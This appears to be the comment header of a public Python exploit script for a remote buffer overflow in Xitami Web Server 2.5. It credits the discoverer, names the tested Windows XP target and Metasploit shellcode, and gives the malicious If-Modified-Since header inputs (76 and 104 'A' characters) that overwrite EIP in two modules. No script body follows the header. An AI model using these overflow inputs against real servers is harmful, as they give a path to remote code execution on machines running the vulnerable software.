#!/usr/bin/python
# Xitami Web Server 2.5 (If-Modified-Since) 0day Remote Buffer Overflow Exploit
# Bug discovered by Krystian Kloskowski (h07) <
[email protected]>
# Tested on: Xitami 2.5c2 / XP SP2 Polish
# Shellcode: Windows Execute Command (calc) <metasploit.com>
# Details:..
#
# [Module xigui32.exe]
# If-Modified-Since: Evil, ["A" * 76]\r\n
# EIP 41414141
#
# [Module xitami.exe]
# If-Modified-Since: Evil, ["A" * 104]\r\n
# EIP 41414141
#
# Product Homepage:
http://www.xitami.com/
# Just for fun ;)
##